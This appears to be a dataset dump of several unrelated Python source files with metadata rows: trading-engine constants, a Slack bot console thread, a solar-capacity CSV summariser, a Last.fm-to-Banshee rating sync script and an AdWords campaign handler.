CTAORDER_SELL = u'卖平'
CTAORDER_SELLTODAY = u'卖平今'
CTAORDER_SELLYESTERDAY = u'卖平昨'
CTAORDER_SHORT = u'卖开'
CTAORDER_COVER = u'买平'
CTAORDER_COVERTODAY = u'买今平'
CTAORDER_COVERYESTERDAY = u'买平昨'
DIRECTION_LONG = u'多'
DIRECTION_SHORT = u'空'
# 本地停止单状态
STOPORDER_WAITING = u'等待中'
STOPORDER_CANCELLED = u'已撤销'
STOPORDER_TRIGGERED = u'已触发'
# 本地停止单前缀
STOPORDERPREFIX = 'CtaStopOrder.'
# 数据库名称
SETTING_DB_NAME = 'VnTrader_Setting_Db'
POSITION_DB_NAME = 'VnTrader_Position_Db'
BARSIZE_DICT = {}
BARSIZE_DICT = {
0 : 'tick',
1 : '1 secs',
2 : '5 secs',
3 : '15 secs',
4 : '30 secs',
5 : '1 min',
6 : '2 mins',
7 : '3 min',
8 : '5 mins',
9 : '15 mins',
10 : '30 mins',
11 : '1 hour',
12 : '1 day'
}
# 使用的缓存表
# 临时变量使用 barSize
BARSIZE_DFNAME_DICT = {}
BARSIZE_DFNAME_DICT = {
0 : 'df_tick',
1 : 'df_S_Bar',
2 : 'df_S5_Bar',
3 : 'df_S15_Bar',
4 : 'df_S30_Bar',
5 : 'df_M1_Bar',
6 : 'df_M2_Bar',
7 : 'df_M3_Bar',
8 : 'df_M5_Bar',
9 : 'df_M15_Bar',
10 : 'df_M30_Bar',
11 : 'df_H_Bar',
12 : 'df_D_Bar'
}
# BARSIZE 跟本地数据库名的对应关系
# 库名要同 ctaBase 一致
BARSIZE_DBNAME_DICT = {}
BARSIZE_DBNAME_DICT = {
0:'VnTrader_Tick_Db',
5:'VnTrader_1Min_Db',
8:'VnTrader_5Min_Db',
9: 'VnTrader_15Min_Db',
10: 'VnTrader_30Min_Db',
11: 'VnTrader_Hour_Db',
12: 'VnTrader_Daily_Db'
}
# 数据库名称
SETTING_DB_NAME = 'VnTrader_Setting_Db'
TICK_DB_NAME = 'VnTrader_Tick_Db'
DAILY_DB_NAME = 'VnTrader_Daily_Db'
MINUTE_DB_NAME = 'VnTrader_1Min_Db' # 分钟 数据库名称 原名是 : 'VnTrader_1Min_Db'
# 自己加上
HOUR_DB_NAME = 'VnTrader_Hour_Db'
MINUTE5_DB_NAME = 'VnTrader_5Min_Db'
MINUTE15_DB_NAME = 'VnTrader_15Min_Db'
MINUTE30_DB_NAME = 'VnTrader_30Min_Db'
# 引擎类型,用于区分当前策略的运行环境
ENGINETYPE_BACKTESTING = 'backtesting' # 回测
ENGINETYPE_TRADING = 'trading' # 实盘
# CTA引擎中涉及的数据类定义
from vtConstant import EMPTY_UNICODE, EMPTY_STRING, EMPTY_FLOAT, EMPTY_INT
########################################################################
class StopOrder(object):
"""本地停止单"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.vtSymbol = EMPTY_STRING
self.orderType = EMPTY_UNICODE
self.direction = EMPTY_UNICODE
self.offset = EMPTY_UNICODE
self.price = EMPTY_FLOAT
self.volume = EMPTY_INT
self.strategy = None # 下停止单的策略对象
self.stopOrderID = EMPTY_STRING # 停止单的本地编号
self.status = EMPTY_STRING # 停止单状态
########################################################################
class CtaBarData(object):
"""K线数据"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.vtSymbol = EMPTY_STRING # vt系统代码
self.symbol = EMPTY_STRING # 代码
self.exchange = EMPTY_STRING # 交易所
self.open = EMPTY_FLOAT # OHLC
self.high = EMPTY_FLOAT
self.low = EMPTY_FLOAT
self.close = EMPTY_FLOAT
self.date = EMPTY_STRING # bar开始的时间,日期
self.time = EMPTY_STRING # 时间
self.datetime = None # python的datetime时间对象
self.volume = EMPTY_INT # 成交量
self.openInterest = EMPTY_INT # 持仓量
########################################################################
class CtaTickData(object):
"""Tick数据"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.vtSymbol = EMPTY_STRING # vt系统代码
self.symbol = EMPTY_STRING # 合约代码
self.exchange = EMPTY_STRING # 交易所代码
# 成交数据
self.lastPrice = EMPTY_FLOAT # 最新成交价
self.volume = EMPTY_INT # 最新成交量
self.openInterest = EMPTY_INT # 持仓量
self.upperLimit = EMPTY_FLOAT # 涨停价
self.lowerLimit = EMPTY_FLOAT # 跌停价
# tick的时间
self.date = EMPTY_STRING # 日期
self.time = EMPTY_STRING # 时间
self.datetime = None # python的datetime时间对象
# 五档行情
self.bidPrice1 = EMPTY_FLOAT
self.bidPrice2 = EMPTY_FLOAT
self.bidPrice3 = EMPTY_FLOAT
self.bidPrice4 = EMPTY_FLOAT
self.bidPrice5 = EMPTY_FLOAT
self.askPrice1 = EMPTY_FLOAT
self.askPrice2 = EMPTY_FLOAT
self.askPrice3 = EMPTY_FLOAT
self.askPrice4 = EMPTY_FLOAT
self.askPrice5 = EMPTY_FLOAT
self.bidVolume1 = EMPTY_INT
self.bidVolume2 = EMPTY_INT
self.bidVolume3 = EMPTY_INT
self.bidVolume4 = EMPTY_INT
self.bidVolume5 = EMPTY_INT
self.askVolume1 = EMPTY_INT
self.askVolume2 = EMPTY_INT
self.askVolume3 = EMPTY_INT
self.askVolume4 = EMPTY_INT
self.askVolume5 = EMPTY_INT
|
mit
| 8,423,452,578,316,974,000
| 25.412935
| 79
| 0.514883
| false
| 2.730453
| false
| false
| false
|
OpenToAllCTF/OTA-Challenge-Bot
|
server/consolethread.py
|
1
|
1960
|
import threading
from bottypes.invalid_console_command import InvalidConsoleCommand
from util.loghandler import log
class ConsoleThread(threading.Thread):
def __init__(self, botserver):
self.botserver = botserver
threading.Thread.__init__(self)
def update_config(self, option, value):
try:
self.botserver.set_config_option(option, value)
except InvalidConsoleCommand as e:
log.error(e)
def show_set_usage(self):
print("\nUsage: set <option> <value>")
print("")
print("Available options:")
if self.botserver.config:
for config_option in self.botserver.config:
print("{0:20} = {1}".format(config_option,
self.botserver.config[config_option]))
print("")
def quit(self):
"""Inform the application that it is quitting."""
log.info("Shutting down")
self.running = False
def run(self):
self.running = True
while self.running:
try:
parts = input("").split(" ")
cmd = parts[0].lower()
if cmd == "quit":
self.botserver.quit()
break
# Example command: Useless, but just an example, for what
# console handler could do
elif cmd == "createchannel":
if len(parts) < 2:
print("Usage: createchannel <channel>")
else:
self.botserver.slack_wrapper.create_channel(parts[1])
elif cmd == "set":
if len(parts) < 3:
self.show_set_usage()
else:
self.update_config(parts[1], parts[2])
except Exception:
log.exception("An error has occured while processing a console command")
|
mit
| -3,119,133,389,237,143,600
| 31.131148
| 88
| 0.512245
| false
| 4.722892
| true
| false
| false
|
Thomasvdw/ProgProject
|
Data/PVdata/add_sum_capacity_perdate.py
|
1
|
4323
|
# -*- coding: utf-8 -*-
"""
Created on Wed May 27 20:06:01 2015
@author: Thomas
"""
# Python standard library imports
import csv
import os
def main():
sizes = []
for file in os.listdir("reformatted/"):
print file
size_total = []
size_2000 = []
size_2001 = []
size_2002 = []
size_2003 = []
size_2004 = []
size_2005 = []
size_2006 = []
size_2007 = []
size_2008 = []
size_2009 = []
size_2010 = []
size_2011 = []
size_2012 = []
size_2013 = []
size_2014 = []
size_2015 = []
name = "reformatted/" + file
with open(name, 'r') as csvfile:
reader = csv.reader(csvfile, delimiter = ",")
next(csvfile)
for row in reader:
date = str(row[4])
date = date[-4:]
try:
size = row[2]
size = float(size)
if size > 200 or len(str(size)) > 6:
size = 0
if date < "2015":
size_2015.append(size)
if date < "2014":
size_2014.append(size)
if date < "2013":
size_2013.append(size)
if date < "2012":
size_2012.append(size)
if date < "2011":
size_2011.append(size)
if date < "2010":
size_2010.append(size)
if date < "2009":
size_2009.append(size)
if date < "2008":
size_2008.append(size)
if date < "2007":
size_2007.append(size)
if date < "2006":
size_2006.append(size)
if date < "2005":
size_2005.append(size)
if date < "2004":
size_2004.append(size)
if date < "2003":
size_2003.append(size)
if date < "2002":
size_2002.append(size)
if date < "2001":
size_2001.append(size)
if date < "2000":
size_2000.append(size)
size_total.append(size)
except ValueError:
pass
size2015 = sum(size_2015)
size2014 = sum(size_2014)
size2013 = sum(size_2013)
size2012 = sum(size_2012)
size2011 = sum(size_2011)
size2010 = sum(size_2010)
size2009 = sum(size_2009)
size2008 = sum(size_2008)
size2007 = sum(size_2007)
size2006 = sum(size_2006)
size2005 = sum(size_2005)
size2004 = sum(size_2004)
size2003 = sum(size_2003)
size2002 = sum(size_2002)
size2001 = sum(size_2001)
size2000 = sum(size_2000)
sizetotal = sum(size_total)
all_sizes = [int(size2015), int(size2014), int(size2013), int(size2012),
int(size2011), int(size2010), int(size2009), int(size2008),
int(size2007), int(size2006), int(size2005), int(size2004),
int(size2003), int(size2002), int(size2001), int(size2000),
int(sizetotal)]
sizes.append(all_sizes)
dates = ['1/1/2015', '1/1/2014', '1/1/2013', '1/1/2012',
'1/1/2011', '1/1/2010', '1/1/2009', '1/1/2008',
'1/1/2007', '1/1/2006', '1/1/2005', '1/1/2004',
'1/1/2003', '1/1/2002', '1/1/2001', '1/1/2000', "total"]
for x, file in enumerate(os.listdir("reformatted/")):
name = "population_energy_growth/solar_size/" + "solar_size_" + file
with open(name, 'wb') as f:
writer = csv.writer(f)
writer.writerow(['Date', 'Size'])
for i in range(17):
writer.writerow([dates[i], sizes[x][i]])
return sizes, dates
if __name__ == '__main__':
sizes, dates = main()
|
mit
| -6,894,113,067,600,910,000
| 31.757576
| 81
| 0.417303
| false
| 4.070621
| false
| false
| false
|
argvk/lastfmloved-syncer
|
update_banshee.py
|
1
|
1928
|
import sqlite3
import sys
import requests
import xml.dom.minidom
from os import path
con = None
artists = {}
url_params = {}
total_pages = -1
page_no = 0
user_name = sys.argv[1]
banshee_db = path.expanduser("~/.config/banshee-1/banshee.db")
con = sqlite3.connect(banshee_db)
cur = con.cursor()
while True:
if total_pages == page_no:
break
url_params['page'] = page_no
page_no = page_no + 1
r = requests.get("http://ws.audioscrobbler.com/2.0/user/" + user_name + "/lovedtracks.xml",params = url_params)
request_result = xml.dom.minidom.parseString(r.content)
if total_pages == -1:
total_pages = int(request_result.getElementsByTagName("lovedtracks")[0].attributes["totalPages"].value)
for track_data in request_result.getElementsByTagName("track"):
track_raw = track_data.getElementsByTagName("name")[0].firstChild.nodeValue
artist_raw = track_data.getElementsByTagName("name")[1].firstChild.nodeValue
track = track_raw.lower().replace("'","").replace(".","")
artist = artist_raw.lower().replace("'","").replace(".","")
print track,
print '|',
print artist,
print '|',
if artist not in artists:
cur.execute('SELECT ca.ArtistId FROM CoreArtists ca WHERE ca.NameLowered = ? LIMIT 1',(artist,))
row = cur.fetchone()
if row == None:
print 'artist not found'
continue
artists[artist] = row[0]
artist_id = artists[artist]
print artist_id,
print '|',
try:
with con:
cur.execute('UPDATE CoreTracks SET Rating = 5 WHERE CoreTracks.TitleLowered = ? AND CoreTracks.ArtistId = ? ', (track,artist_id,))
except sqlite3.Error, e:
print "error %s:" % e.args[0]
sys.exit(1)
print 'updated' ,cur.rowcount
if con:
con.close()
|
mit
| -6,483,506,008,347,363,000
| 25.777778
| 146
| 0.598029
| false
| 3.658444
| false
| false
| false
|
googleads/googleads-python-lib
|
examples/adwords/adwords_appengine_demo/views/add_campaign_view.py
|
1
|
2373
|
#!/usr/bin/env python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handles request to add a Campaign to a client account."""
import os
from handlers.api_handler import APIHandler
from handlers.ndb_handler import InitUser
import webapp2
from google.appengine.api import users
from google.appengine.ext.webapp import template
class AddCampaign(webapp2.RequestHandler):
"""View that either adds a Campaign or displays an error message."""
def post(self):
"""Handle post request."""
client_customer_id = self.request.get('clientCustomerId')
campaign_name = self.request.get('campaignName')
ad_channel_type = self.request.get('adChannelType')
budget = self.request.get('budget')
template_values = {
'back_url': '/showCampaigns?clientCustomerId=%s' % client_customer_id,
'back_msg': 'View Campaigns',
'logout_url': users.create_logout_url('/'),
'user_nickname': users.get_current_user().nickname()
}
try:
app_user = InitUser()
# Load Client instance.
handler = APIHandler(app_user.client_id,
app_user.client_secret,
app_user.refresh_token,
app_user.adwords_manager_cid,
app_user.developer_token)
# Create new campaign.
handler.AddCampaign(client_customer_id, campaign_name,
ad_channel_type, budget)
self.redirect('/showCampaigns?clientCustomerId=%s' % client_customer_id)
except Exception as e:
template_values['error'] = str(e)
# Use template to write output to the page.
path = os.path.join(os.path.dirname(__file__),
'../templates/base_template.html')
self.response.out.write(template.render(path, template_values))
|
apache-2.0
| 375,887,224,737,519,740
| 35.507692
| 78
| 0.664981
| false
| 3.981544
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.